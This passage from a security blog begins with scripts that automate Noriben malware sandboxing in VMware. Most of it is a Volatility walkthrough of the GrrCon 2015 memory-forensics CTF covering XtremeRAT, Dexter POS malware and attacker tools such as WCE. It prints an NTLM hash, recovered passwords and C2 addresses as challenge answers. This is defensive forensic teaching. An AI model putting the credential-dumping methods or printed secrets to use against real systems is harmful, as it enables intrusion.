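        [vmrun, "-T", "ws", "start", vmx],
        [vmrun, *auth, "copyFileFromHostToGuest", vmx, sample, guest_sample],
        [vmrun, "-T", "ws", *auth, "runProgramInGuest", vmx,
         "C:\\Python27\\Python.exe", noriben, "-d", "-t", str(delay),
         "--cmd", guest_sample, "--output", logs],
        [vmrun, "-T", "ws", *auth, "runProgramInGuest", vmx,
         "C:\\Tools\\zip.exe", "-j", guest_zip, logs + "\\*.*"],
        [vmrun, *auth, "copyFileFromGuestToHost", vmx, guest_zip, out_zip],
    ]


def run_steps(steps):
    """Run each step in order, stopping at the first one that fails."""
    for argv in steps:
        subprocess.run(argv, check=True)
```

Passing argv lists rather than one big string sidesteps the quoting headaches around paths with spaces. Note that `check=True` treats any nonzero exit as fatal, which is stricter than the shell version's special case for zip's exit code 12.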

In action, here's a video of a malware file being scanned using this script:



Similarly, there's a script on Github for those running a Windows host:


:Noriben Sandbox Automation Script
:Responsible for:
:* Copying malware into a known VM
:* Running malware sample
:* Copying off results
:
:Ensure you set the environment variables below to match your system
@echo off
if "%1"=="" goto HELP
if not exist "%1" goto HELP

set DELAY=10
set CWD=%CD%
set VMRUN="C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe"
set VMX="e:\VMs\WinXP_Malware\WinXP_Malware.vmx"
set VM_SNAPSHOT="Baseline"
SET VM_USER=Administrator
set VM_PASS=password
set FILENAME=%~nx1
set NORIBEN_PATH="C:\Documents and Settings\%VM_USER%\Desktop\Noriben.py"
set LOG_PATH="C:\Noriben_Logs"
set ZIP_PATH="C:\Tools\zip.exe"



%VMRUN% -T ws revertToSnapshot %VMX% %VM_SNAPSHOT%
%VMRUN% -T ws start %VMX%
%VMRUN% -gu %VM_USER% -gp %VM_PASS% copyFileFromHostToGuest %VMX% "%1" C:\Malware\malware.exe
echo %VMRUN% -T ws -gu %VM_USER% -gp %VM_PASS% runProgramInGuest %VMX% C:\Python27\Python.exe %NORIBEN_PATH% -d -t %DELAY% --cmd "C:\Malware\Malware.exe" --output %LOG_PATH%
%VMRUN% -T ws -gu %VM_USER% -gp %VM_PASS% runProgramInGuest %VMX% C:\Python27\Python.exe %NORIBEN_PATH% -d -t %DELAY% --cmd "C:\Malware\Malware.exe" --output %LOG_PATH%
if %ERRORLEVEL%==1 goto ERROR1
%VMRUN% -T ws -gu %VM_USER% -gp %VM_PASS% runProgramInGuest %VMX% %ZIP_PATH% -j C:\NoribenReports.zip %LOG_PATH%\*.*
%VMRUN% -gu %VM_USER% -gp %VM_PASS% copyFileFromGuestToHost %VMX% C:\NoribenReports.zip %CWD%\NoribenReports_%FILENAME%.zip
goto END

:ERROR1
echo [!] File did not execute in VM correctly.
goto END

:HELP
echo Please provide executable filename as an argument.
echo For example:
echo %~nx0 C:\Malware\ef8188aa1dfa2ab07af527bab6c8baf7
goto END

:END


A similar script can be written for VirtualBox. However, I ran into numerous issues getting the "guestcontrol copyto" to copy files in and out. If you'd like to take a stab at this, based on the code above, feel free!

How you can help!


As the developer of open-source software, the biggest hurdle is in handling every edge case. I am the sole developer (currently) of Noriben, therefore it is geared and written to my experiences. I love getting bug reports because (a) I know people are using it and (b) each person's system has its own unique qualities.

If you want to provide the most help for me there are two ways that I would greatly appreciate!

  1. Help me with the development through leveraging your programming expertise to improve it.
  2. Help to develop new white list filters.

The first is limited to a small set of people, but anyone can help with the second! The white list filters I use are based primarily off of my own VMs. But, as I've seen with others' reports, there are numerous other items that could be whitelisted. I had one analyst send me a report that had hundreds of items, whereas my own system typically produces less than two dozen. He simply had a lot of backend applications that I was not expecting (such as ngen.exe). Someone else had print drivers continuously being updated. 
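To make the whitelist idea concrete, here is a toy sketch of the concept: drop any event line that matches a known-benign pattern. It is not Noriben's actual filter code or format. The event strings and patterns below are made up for illustration.

```python
import re


def filter_events(events, whitelist):
    """Return only the events that match none of the whitelist patterns."""
    patterns = [re.compile(p, re.IGNORECASE) for p in whitelist]
    return [e for e in events if not any(p.search(e) for p in patterns)]


# Hypothetical event lines, purely for illustration
events = [
    r"CreateFile ngen.exe C:\Windows\assembly\tmp.dat",
    r"CreateFile malware.exe C:\Users\victim\evil.dll",
]
whitelist = [r"ngen\.exe"]
print(filter_events(events, whitelist))
```

Every pattern contributed from a clean run shrinks the report for everyone, which is why results from systems unlike mine are so useful.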

To help, right now, download the files here into your VM and simply run it. Let it run for a minute or two without malware. Simply run Calc or Notepad. Then stop collection and send me the results. As there is no malware running, the results shown should likely be whitelisted for everyone. Take this and email your files to me (feel free to scrub any proprietary information) at brian @@ thebaskins.com.

Download Information


Noriben is hosted publicly on Github at: https://github.com/Rurik/Noriben.
At a minimum, you can download Noriben.py and be up and running. It is preferable that you also download ProcmonConfiguration.pmc and store it alongside Noriben.py. This configuration file contains numerous pre-analysis whitelists that could reduce your process logs from hundreds of megabytes to less than 10MB.


Thanks for reading and hopefully this will help you improve your defenses and incident response reaction times for the new year!

GrrCon 2015 - Memory Forensics - Grabbing all the Flags...

Today we bring you a special guest posting by Tony "@captcook32" Cook. Late last year GrrCon hosted their highly anticipated, excellent set of challenges, which included an in-depth memory forensics challenge by Wyatt Roersma. Tony and I took a few days on a down week to try our hand at the challenge. I lacked the answers to two questions while Tony knocked them all out quickly.

While the scoreboard was reset to before our scores were posted, I'd like to present Tony's write-up on the challenge. The challenge files are still available for download, so feel free to try the challenge on your own and return for hints. Next to each question is the file required to answer it and the password needed to open the archive.

And so follows Tony Cook:





In October 2015 GrrCon put on the GrrCon 2015 CTF challenge, which was open to all who wanted to attempt it. My colleague "The Brian Baskin" @bbaskin let me know it was going on & I wanted to test out my memory forensics skills so I gave it a shot. This was one of the most fun & valuable CTFs that I've ever done. I want to give a huge shout out to the Volatility team for their awesome product & to the GrrCon 2015 CTF team for having a semi real world challenge that made you think outside of the box. The following blog post is my walkthrough of how I got through the challenge. There are most likely far better ways to go about doing most of these & I don't claim to be a memory forensic expert but I hope this helps out anyone who got stuck on any of the questions &/or anyone looking for an explanation.

Question #1


We start out with a question letting us know that a user opened a "strange" email that appeared to be a security update, kudos to the CTF creators because who hasn't seen that happen... All we need to provide is the sender's email address. As with all of these questions there are about a million different approaches that we could take to find the answer. However, the way my lazy mind works, I wanted to start by finding all the email addresses within the memory dump, then grep through the memory dump for those addresses in the hope of finding an email that resembled the one the user received. So to start with I utilized Garfinkel's amazing tool, Bulk Extractor. Among several other options this tool can provide you with a histogram of email addresses, which gives us a starting point for looking through the memory dump.





# BULK_EXTRACTOR-Version: 1.5.2 ($Rev: 10844 $)
# Feature-Recorder: email
# Filename: C:\Users\Admin\Desktop\target1\copy.raw
# Histogram-File-Version: 1.1
n=448 4b05e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=164)
n=382 frontdesk@allsafecybersec.com (utf16=356)
n=171 cps-requests@verisign.com (utf16=1)
n=42 th3wh1t3r0s3@gmail.com (utf16=37)
n=24 test@allsafecybersec.com (utf16=20)
n=12 hernan@ampliasecurity.com (utf16=4)
n=9 support@teamviewer.com (utf16=9)
n=8 uxcyieztisogfmcq@mail.gmail.com (utf16=8)
n=6 front-desk@www.ms (utf16=6)
n=6 rontdesk@allsafecybersec.com (utf16=6)
n=6 someone@microsoft.com
n=5 front-desk@www.bi (utf16=5)
n=4 b05e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=4)
n=4 certificate@trustcenter.de
n=4 efrontdesk@allsafecybersec.com (utf16=4)
n=4 front-desk@c.ms (utf16=4)
n=4 frontdesk@c.ms (utf16=4)
n=4 gtk-devel-list@gnome.org
n=3 frontdesk@www.ms (utf16=3)
n=3 ftp@example.com
n=3 smtpth3wh1t3r0s3@gmail.com (utf16=3)
n=3 user@domain.microsoft.com (utf16=3)
n=2 4cf-53ec8e59b175@allsafecybersec.com
n=2 anonymous@discussions.microsoft.com (utf16=1)
n=2 cps@netlock.net
n=2 e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=1)
n=2 ellen@contoso.com (utf16=2)
n=2 ellenorzes@netlock.net
n=2 front-desk@c.bi (utf16=2)
n=2 frontdesk@c.bi (utf16=2)
n=2 frontdesk@www.bi (utf16=2)
n=2 g.j@g.jtg.jp
n=2 gtkmm-list@gnome.org
n=2 jane@dstc.edu.au
n=2 lagoze@cs.cornell.edu
n=2 me@xyz.com (utf16=2)
n=2 p.johnston@ukoln.ac.uk
n=2 rb05e584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=2)
n=2 t-cole3@uiuc.edu
n=2 tdesk@allsafecybersec.com (utf16=2)
n=2 test@allsafecybersec.com.ost.tm (utf16=2)
n=2 thabing@uiuc.edu
n=1 1dbb1f52d09c41deb0219406e46b6d81@ex01.al (utf16=1)
n=1 4-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com (utf16=1)
n=1 53ec8e59b175@allsafecybersec.com (utf16=1)
n=1 584-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com
n=1 59b175@allsafecybersec.com (utf16=1)
n=1 6-4554-84cf-53ec8e59b175@allsafecybersec.com
n=1 6e6@machine.in (utf16=1)
n=1 75@allsafecybersec.com (utf16=1)
n=1 84-8dc6-4554-84cf-53ec8e59b175@allsafecybersec.com
n=1 8e59b175@allsafecybersec.com (utf16=1)
n=1 8rontdesk@allsafecybersec.com (utf16=1)
n=1 allsafecybersec.localcf-53ec8e59b175@allsafecybersec.com (utf16=1)
n=1 b175@allsafecybersec.com (utf16=1)
n=1 c14e99c7-44bb-44ef-9f1d-5342c0afce0c@live.com (utf16=1)
n=1 com@machine.in (utf16=1)
n=1 controsts@verisign.com
n=1 d_1@machine.in (utf16=1)
n=1 defaultuser@defaultdomain.de (utf16=1)
n=1 dev@acpi.in (utf16=1)
n=1 e59b175@allsafecybersec.com (utf16=1)
n=1 ec8e59b175@allsafecybersec.com
n=1 effrontdesk@allsafecybersec.com (utf16=1)
n=1 en@cpu.in (utf16=1)
n=1 esmtpth3wh1t3r0s3@gmail.com (utf16=1)
n=1 f5515863b958724ebfb72c5011bfddcc@allsafecybersec.com (utf16=1)
n=1 frontdesk@allsafecybersec.co
n=1 g2v@machine.in (utf16=1)
n=1 h1t3r0s3@gmail.com (utf16=1)
n=1 i8e59b175@allsafecybersec.com
n=1 ieuser@microsoft.com (utf16=1)
n=1 inf@machine.in (utf16=1)
n=1 info@incomedia.it (utf16=1)
n=1 ins@oem1.in (utf16=1)
n=1 ion@machine.in (utf16=1)
n=1 ip6@cpu.in (utf16=1)
n=1 ipm.microsoft.contactlink.timestampfrontdesk@allsafecybersec.com (utf16=1)
n=1 jeffsmith@redmond.co (utf16=1)
n=1 le@machine.in (utf16=1)
n=1 le@oem1.in (utf16=1)
n=1 led@machine.in (utf16=1)
n=1 nodtse@klaslfacebyrees.co (utf16=1)
n=1 ntdesk@allsafecybersec.com (utf16=1)
n=1 ontdesk@allsafecybersec.com
n=1 outlook2.ostfrontdesk@allsafecybersec.com (utf16=1)
n=1 pfrontdesk@allsafecybersec.com (utf16=1)
n=1 rai@machine.in (utf16=1)
n=1 rnan@ampliasecurity.com
n=1 rya@machine.in (utf16=1)
n=1 sk@allsafecybersec.com (utf16=1)
n=1 snmpinfo@microsoft.com
n=1 someone@example.com (utf16=1)
n=1 ssr@umbus.in (utf16=1)
n=1 t3r0s3@gmail.com (utf16=1)
n=1 ta@rdpbus.in (utf16=1)
n=1 tuhtmhhttht@ht.ht
n=1 vista@gn.microsoft.com
n=1 vshubin@ntdev.microsoft.com
n=1 whit3r0s3th3wh1t3r0s3@gmail.com (utf16=1)
n=1 wm@machine.in (utf16=1)
n=1 wotdiityitmit@it.it
n=1 x-user-identityfrontdesk@allsafecybersec.com
n=1 y4cf-53ec8e59b175@allsafecybersec.com (utf16=1)

As I quickly looked over the top 5 highest counts a couple of the email addresses looked suspicious. However "th3wh1t3r0s3@gmail.com" stood out the most to me. Regardless how suspicious they might look to me now I had email addresses I could start to search for. 

Now we have a start but nothing to search through so I had to create a Volatility strings file. The instructions to complete this step are in this link. Once I created this file I simply started searching for the email addresses I had found in the Bulk Extractor output while looking for an email that resembled what the user had been sent. Lo and behold, remnants of an email from the suspicious email address concerning an update to the user's VPN software.


Notice that there is a PID associated with the strings thanks to the Volatility strings command, so to confirm which process these strings belonged to I ran psxview on the memory file.


Now that I had confirmed that these strings came from the Outlook.exe process, I rolled the dice and put in the suspect email address as the answer.

Answer: th3wh1t3r0s3@gmail.com

[Ed. Note: I took a different approach here. I knew it was an email, so my first step was a simple Volatility `yarascan -Y "From: "` which immediately produced the email address from the OUTLOOK.EXE process]

Question #2 


The next question was kind of tricky, but only because of its wording. Essentially it only asked what file was delivered in the previous email. Since I had already done the work to find the email, this was as simple as referring back to the link in the email.

Answer: AnyConnectInstaller.exe

Question #3



The CTF creators knew they took it a bit easy on the last question, so they got a bit trickier on this one. Now that I had the filename I needed to figure out where and what it was. One of the Volatility plugins that I thought of to help me find the location of the file was FileScan. This nifty little tool scans the memory dump for FILE_OBJECTs, with the output listing the physical offset of the FILE_OBJECT, file name, number of pointers to the object, number of handles to the object, and the effective permissions granted to the object. At this point I could have added some regex searching to my command to search for only the filename I was looking for, but I wasn't sure whether I'd come across other files later in the challenge, so I ran FileScan to find every FILE_OBJECT it could in the memory dump.


Now that I had that output I could search it to see if the "AnyConnectInstaller.exe" had any FILE_OBJECTS open. It turned out that there were a few entries for AnyConnectInstaller.exe which were the file itself & two Prefetch Files, which led me to believe the file had been executed on the host. 


Now that I knew the location of the file, I could use another Volatility plugin, DumpFiles, which can carve files out using the physical offset.
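The search-then-carve step can be sketched as a small parser over saved FileScan output. This is only an illustration: the column layout is taken from the single FileScan line quoted later in this writeup, and the helper name `find_file_objects` is made up for the example. The offset it returns is the value you would hand to dumpfiles (Volatility 2 accepts a physical offset via `-Q`).

```python
import re

# Columns: physical offset, #pointers, #handles, access flags, then the path
# (the path may contain spaces, so it takes the rest of the line).
ROW = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(.+)$")

def find_file_objects(lines, needle):
    """Return (offset, path) pairs whose path contains needle, case-insensitively."""
    hits = []
    for line in lines:
        match = ROW.match(line.strip())
        if match and needle.lower() in match.group(5).lower():
            hits.append((int(match.group(1), 16), match.group(5)))
    return hits

# Sample row copied from the FileScan output quoted later in this writeup.
SAMPLE = [
    r"0x000000003e7ab038      8      0 -W-rwd \Device\HarddiskVolume2\Users\pos\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\NEQ2CLDX\allsafe_update[1].exe",
]

if __name__ == "__main__":
    for offset, path in find_file_objects(SAMPLE, "allsafe_update"):
        print(hex(offset), path)
```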


Voila, I now had the suspicious file in my possession. Now what? Next I did some quick static analysis of the file, only to be dismayed that it was a Borland executable; this wouldn't be as simple as I thought it could be. Strings of the executable showed that there might be a correlation to XTREME; however, upon trying "XTREME" as the answer I was denied...

The next thing I did was run it in a sandbox tool made by Brian Baskin, Noriben, to get a feel for what the executable does.


Through the process information I saw that upon execution the file attempts to inject itself into iexplore.exe and creates a "Temp\XtremeServerSource.dat" file. At this point I was getting a bit frustrated with the analysis as I was no closer to getting the answer to the question. I decided to fire up Process Hacker and look at the memory of the injected iexplore.exe to see if I could glean anything from that before having to open up some debugging tools. I searched for the injected file name to begin with to see if I'd have any luck...



As soon as I searched for the file I found several interesting strings that led me down the right path and what I had been missing. The question stated that the answer would be one word and no spaces. While I had tried Xtreme... I had not tried XtremeRAT. I rolled the dice & jackpot...

Answer: XTREMERAT

Question #4


In this question the CTF creator wanted to know which process the suspicious file was attempting to inject into. In the quest to find the "malware name" of the suspicious file, we determined that upon execution it would attempt to inject into iexplore.exe, so the next step was to determine what process ID iexplore.exe had. A quick run of Volatility's PSXVIEW gave me that answer.



The process iexplore.exe has the PID of 2996... Put it in and... BOOM!!!


Question #5


In this question they wanted to know the persistence value that the malware was using. From my earlier Noriben analysis of the suspicious file, I knew that it was creating Registry entries under \CurrentVersion\Run, so it was just a matter of determining the value that stored the file path.


Mr Robot. Just as the question alluded to, you'll know it when you see it, so I felt comfortable this was the answer.

Answer: MrRobot


Question #6


This question required me to do a bit of malware analysis as I couldn't quite understand what was happening with the malware just by the memory image. I didn't have a whole lot of knowledge about how XtremeRat worked so after a bit of OSINT I came across a few blog posts that helped me understand how it worked.

https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html
https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

After reading through these I understood that the malware injects the config file into memory and then RC4-decodes its data. I also knew that this config file should be allocated all at once, meaning that all of the information "should" be together in one memory section. I also knew that it should contain the name of the executable, the directory file location, & FTP information. So now I had a starting point for looking through memory.

Since I had the malware already in hand I moved it over to a VM with some Process Monitoring tools to see how it worked. I used the information I ascertained about the malware injecting into an Internet Explorer process to filter down using Process Hacker. Then I ran strings on the memory of the process & filtered for "FTP".



I only noticed one legitimate FTP site in the list, so I clicked on that to drill into its memory section. When I reviewed it I saw everything I had learned about the config file from the blog posts, including the Mutex, FTP information, & Directory Location. I then saved out that portion of the memory section & ran strings on it. After removing the obvious garbage I was left with the following output.


I was looking for a C2 password in this entire list of strings. I removed the Xtreme RAT references, the Mutex, the Registry Input, the addresses, the Directory Locations, & errors to get down to 7 possibilities. After reviewing the question I had 10 possible tries, so I went through them all. I was starting to get a bit nervous as I reached the end of the list; however, upon trying "GrrCon2015" I was given the green light & I wiped the sweat from my forehead. Now is there a better & more accurate way to do this? Absolutely. You could follow the Malware.lu blog post & completely reverse the executable to find the correct answer. After the contest I went back and did so, which I recommend everyone try in order to see the little nuances in this Xtreme RAT executable, but that's for another blog post & another time.

Answer: GrrCon2015

Question #7


This question was essentially just asking for the mutex of the file. Utilizing the handles plugin I was able to filter down to only mutant objects, and only those associated with the process where the malware was running (PID 2996), leaving me only a couple of options to try to find the right answer.



Answer: fsociety0.dat

Question #8


This question was a little tough for me at first because I was looking for all the clues in all the wrong places. What I ended up doing was trying to look for accounts that had previously been on the box even though their account might have been deleted. This led me to dumping the MFT and looking for old profiles. In looking for this I found ol "zero cool" from Hackers.





Answer: Hackers

[Ed. Note: I did a very ghetto cmdline here :)
grep -i "Users" target1_mftparser.txt | gawk "{print $NF}" | grep -o "^Users.........." | sort | uniq]


Question #9


This question was fairly straightforward and simple, get the Administrator's NTLM hash. This can be completed by running the hashdump plugin on the memory dump, which gave me the answer.



Answer: aad3b435b51404eeaad3b435b51404ee:79402b7671c317877b8b954b3311fa82
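The answer is in the usual LM:NT form. The sketch below splits a pwdump-style line into its fields; the sample line is reconstructed from the answer above using the common `user:RID:LM:NT:::` layout (the actual hashdump output is not reproduced in this writeup), and the function name is made up for the example. The LM half shown here is the well-known hash of an empty password, which is what you normally see when LM storage is disabled.

```python
# LM hash of an empty password; appears when no LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Reconstructed sample line (assumption: standard pwdump layout, RID 500 for
# the built-in Administrator account).
SAMPLE = ("Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
          "79402b7671c317877b8b954b3311fa82:::")

def parse_hashdump_line(line):
    """Split a user:RID:LM:NT::: line into a small dict."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {
        "user": user,
        "rid": int(rid),
        "lm": lm.lower(),
        "nt": nt.lower(),
        "lm_blank": lm.lower() == EMPTY_LM,
    }

if __name__ == "__main__":
    entry = parse_hashdump_line(SAMPLE)
    print("%s -> %s:%s" % (entry["user"], entry["lm"], entry["nt"]))
```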

Question #10


Here's where the analysis starts to get interesting. Now we are being asked to find some tools being used after the initial compromise. How do we start here? My first thought was to run the MFT plugin from Volatility and see what had been put onto the system after the original suspicious file.


Upon opening up the MFT output I immediately searched for the creation time of the AnyConnectInstaller.exe to determine the date and where the rest of my search should continue. Luckily I didn't have to go too far below those entries to find 3 files that I've seen on several IR engagements. "Rar.exe, nbtscan.exe, wce.exe" were all created mere minutes behind the suspicious file. I threw those in alphabetical order and I was off to the races.

ANSWER: nbtscan.exe,rar.exe,wce.exe


Question #11


This question was also pretty straightforward. I had already seen WCE.exe be put on the box, so there should be an associated dumped credential file so the attacker could move the credentials around. In previous memory forensic work I had seen wce at work & I knew that I had seen the entire executed command before in the basic strings output for the memory dump. I attempted the same philosophy here & lightning struck twice.


I now knew the output file of the WCE command was "w.tmp". I could use either my MFT output or my FileScan output to determine the location of the file & carve it out to see what treasures it held.


I opted to use FileScan's Physical location so I could then use the dumpfiles plugin on the address space.


Then it was just a matter of opening the file and seeing what was inside.


There lay the answer to the question.

Answer: flagadmin@1234

Question # 12


This question was asking for the $STD Creation time for the NBTSCAN.EXE tool. Since we already ran the MFTParser tool we have access to the answer already. 


Look under the $STD information & we see the answer. 


Answer: 2015-10-09 10:45:12


Question #13


This question ended up being easier than most of the other questions because the name of the file that needed to be carved out was already given. I followed the same methodology as all of the previous carves.
                Filename -> FileScan Output -> Physical Offset -> DumpFile





Question #14


So finally the competition switches to the network side of things. To first get a glimpse at the network connections I ran the netscan plugin. After seeing the results I knew the PID of the injected process  (iexplore.exe) that the malware was using (2996) so I re-ran the command, this time grepping for just the PID I needed. 



The result was a single connection to "180.76.254.120:22". I took my chances and input it as the answer, BINGO.

Answer: 180.76.254.120:22


Question #15


This question appeared to be quite simple after running the last netscan, as in that output we saw a few connections out to TeamViewer servers. But how could I be sure that it was installed after the attackers got in? I quickly referenced the MFT Parser timeline CSV I created earlier to see what was put on the system AFTER the attackers got in. Sure enough, a TeamViewer installer was found directly after a few Prefetch files for the "attacker" tools seen earlier, as well as an AT command.



Answer: Teamviewer

Question #16


This question was another fairly simple one as long as you understood the Windows OS basics. A built-in remote access tool, huh? I went straight to the netscan output to look for remote desktop connections either using mstsc.exe or over the default port 3389.


Answer: 10.1.1.21

Question #17


Looks like I had finished up with the Target 1 host & moved on to Target 2 for this next question. "Laterally" btw... ;-) Anywho we needed to figure out what Gideon's actual password was. Since we had already seen the attackers use WCE on the target 1 host I assumed that like most attackers that would be the tool they'd use across the board so I took the same approach. I looked for WCE in the strings to see if I could find the entire command. 


Now that I had that, I could run FileScan to see if the file had a FILE_OBJECT. Sure enough it did, so I ran dumpfiles against it to drop out the file and then opened it to find the answer.


Answer: t76fRJhS

[Ed. Note: I failed to get this one :) But in retrospect I now see it in my notes for #18]

Question #18


This next question was a little tricky as well, only because of the wording of the question. At first glance I assumed that the question was what Windows credentials were being used to pivot to the domain controller; however, that must have been the previous question's answer, so I moved on. My next thought went to what I would do if I got creds and wanted to move forward. Well, I'd probably already have a shell open. Fortunately Volatility has just the plugin to show us that input: cmdscan.


Looking at the output I saw wce.exe being executed, so I felt pretty confident this was the conhost.exe I was looking for. Looking further into the output I saw the bad guy run "whoami" to figure out what user he was running as at the time, then map the Z: drive with the current credentials (gideon). Once it was mapped I saw him/her copy over rar.exe, most likely to archive whatever files the attacker was attempting to exfil. Then we see what's really interesting... the attacker uses the RAR command to archive all text files in their current directory with the password 123qwe!@#. Notice that I didn't include the -hp, which is just the switch used to supply a password for RAR files. I input this as the answer and I was on my way to success.

Answer:  123qwe!@#


Question #19


As I started this question I already had the answer from the previous output which was the password protected "crownjewlez.rar".

Answer: CrownJewlez.rar 

Question #20


The next question asks which files were archived inside the RAR file. In order to answer this one I had to think about what actually happened. A conhost.exe was what showed me that the RAR file was created, so maybe if I looked more into that process I would find what files were added to it. The easiest way to do this was to look at the strings for this process for clues to see where I could go next. I ran the Volatility strings process that was explained earlier, then grep'ed for just the process in question, 3048. The result was pretty interesting in that I could see the exact file names that were added to the RAR file.


In the clear text strings I could see 3 files being added to the RAR file after the command was run, similar to what would have been in the output of the command on a terminal. I input these filenames in the order they were added, in the right format, then... boom, winning...

Answer: SecretSauce1.txt,SecretSauce2.txt,SecretSauce3.txt

[Ed. Note: I failed to get this one :)]

Question #21


This question ended up being a basic IR question. A scheduled job was created on the machine, and we have to find the file name that is associated with it, most likely the file that is being run through the task. I knew that scheduled tasks are created in the \Windows\Tasks\ directory & I had already created an output file from the FileScan plugin, so it was just a matter of grepping that file for all the files which were located in that directory.


There were three files found in that directory. The first being the default SCHEDLGU.TXT file, then a GoogleUpdateTask, and finally an At1.job file. By default if no other name is given to a scheduled job utilizing at.exe it will name itself At1.job but this only gets us the file so I carved the file out utilizing the process I had been using previously to see what was in this Job file. The job file is actually not human readable and needed to be parsed utilizing Jamie Levy's jobparse.py. Once the file was parsed it was easy to see that 1.bat was being called during the scheduled time.



Answer: 1.bat 

[Ed. Note: I didn't carve files out but instead expected to find the full contents within the MFT. I displayed each out and eyeballed it:
> grep -i "\.job" target2_mftparser.txt -A50 | grep "\$DATA" -A10
$DATA
0000000000: 01 06 01 00 01 e0 b4 20 f7 a5 f4 43 8d f5 25 57   ...........C..%W
0000000010: 7f 5f a1 48 46 00 d2 00 00 00 00 00 3c 00 0a 00   ._.HF.......<...
0000000020: 20 00 00 00 00 14 73 0f 01 00 00 00 00 13 04 00   ......s.........
0000000030: 02 00 e0 21 df 07 0a 00 05 00 09 00 08 00 00 00   ...!............
0000000040: 00 00 8f 00 00 00 16 00 63 00 3a 00 5c 00 75 00   ........c.:.\.u.
0000000050: 73 00 65 00 72 00 73 00 5c 00 67 00 69 00 64 00   s.e.r.s.\.g.i.d.
0000000060: 65 00 6f 00 6e 00 5c 00 31 00 2e 00 62 00 61 00   e.o.n.\.1...b.a.
0000000070: 74 00 00 00 00 00 00 00 07 00 53 00 59 00 53 00   t.........S.Y.S.
0000000080: 54 00 45 00 4d 00 00 00 1e 00 43 00 72 00 65 00   T.E.M.....C.r.e.
0000000090: 61 00 74 00 65 00 64 00 20 00 62 00 79 00 20 00   a.t.e.d...b.y...]
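The hex dump in the note above can also be decoded programmatically instead of eyeballed. The sketch below is an assumption-laden illustration: it takes rows 0x40 to 0x8f of that dump and treats offset 0x46 as the start of a run of length-prefixed UTF-16LE strings (application name, parameters, working directory, author), which is how the bytes shown line up. It is not a full .job parser like jobparse.py, and the helper name is made up.

```python
import struct

# Rows 0x40-0x8f of the $DATA hex dump above, hex column only.
DUMP_ROWS = """
00 00 8f 00 00 00 16 00 63 00 3a 00 5c 00 75 00
73 00 65 00 72 00 73 00 5c 00 67 00 69 00 64 00
65 00 6f 00 6e 00 5c 00 31 00 2e 00 62 00 61 00
74 00 00 00 00 00 00 00 07 00 53 00 59 00 53 00
54 00 45 00 4d 00 00 00 1e 00 43 00 72 00 65 00
"""
BASE = 0x40  # file offset of the first byte in DUMP_ROWS
data = bytes.fromhex("".join(DUMP_ROWS.split()))

def read_counted_string(buf, pos):
    """Read a 2-byte character count, then that many UTF-16LE characters."""
    (count,) = struct.unpack_from("<H", buf, pos)
    start = pos + 2
    end = start + count * 2
    return buf[start:end].decode("utf-16-le").rstrip("\x00"), end

# Assumption: the first counted string starts at file offset 0x46.
pos = 0x46 - BASE
app_name, pos = read_counted_string(data, pos)
parameters, pos = read_counted_string(data, pos)
working_dir, pos = read_counted_string(data, pos)
author, pos = read_counted_string(data, pos)

if __name__ == "__main__":
    print("application:", app_name)
    print("author:", author)
```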

Question #22


For this next question we moved onto something pseudo new to most IR analysts which is a POS system. The first question was what is the CNC of the malware that we didn't even know was running on the system. Where to start here??? The question asked about a connection so that's where I began my hunt. There must be an outbound connection from the host to something so a quick NETSCAN plugin output showed me there were a few outbound connections. 


Seeing there were only a few processes that had an outbound connection, I listed those PIDs & IPs to start to track down what the culprit was. The first outbound connection seen was to 10.1.1.3, with several connections associated with Outlook.exe. At first glance I moved past this one as it appeared to be an internal Exchange server, but I could have been wrong. The next thing in my plan was to see if there was any injected code in the processes I saw with network connections, using the MALFIND plugin.



After running the MALFIND plugin, the only process with a network connection that showed up was PID 3208. Looking at the output for this process we see an MZ header, which is an indication that the process might have been injected into. To test this theory I ran the same command specifying the PID & a -D to dump out anything we find.


What did it dump out? 


Very nice... Let's see what's in this thing. I submitted the hash of the executable to VirusTotal & what returned was a Dexter variant of POS malware. I felt pretty confident that this process's network connection was the one communicating with the C2 server.


Answer: 54.84.237.92


Question #23


This one was a bit tricky again because of the naming but once I submitted the hash to VirusTotal (See below image) there were really only a couple of options to go with. I tried "SYd!fg" unsuccessfully then tried Dexter FTW.



Answer: Dexter

Question #24



Luckily for this question during my search for the identification of the Dexter malware I found an interesting article from the Volatility blog that dealt precisely with this particular malware.
http://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html

After following the steps shown in the blog I had two very similar DLLs. Looking at the blog and its references I knew that the malware was enumerating processes and comparing them against a list, which was conveniently located at the beginning of the strings. There was one oddity between the blog's version of the strings & the strings I created, and it was very specific to the Allsafe CyberSec company.





Answer: allsafe_protector.exe

Question #25


In this question the creators wanted you to track the attack back to the initial infection vector. In order to do that I needed to create a timeline, in hopes of finding what happened just before these connections were made. I ran the necessary commands found on the Volatility cheat sheet to create the timeline, and searched for the IP connection that I knew had occurred. Boom... It looked as though I had found a file that had been downloaded from the same malicious IP.


After the file is executed we even see the DLLs get loaded into the malicious PID. Safe to say this appears to be the correct file: allsafe_update.exe.




Answer: allsafe_update.exe

[Ed. Note: Using what artifacts I had, I went another route and found the initial executable allsafe_update sitting in Temporary Internet Files. I removed the IE [1] to get the answer:
pos_filescan.txt:0x000000003e7ab038      8      0 -W-rwd \Device\HarddiskVolume2\Users\pos\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\NEQ2CLDX\allsafe_update[1].exe]

Question #26


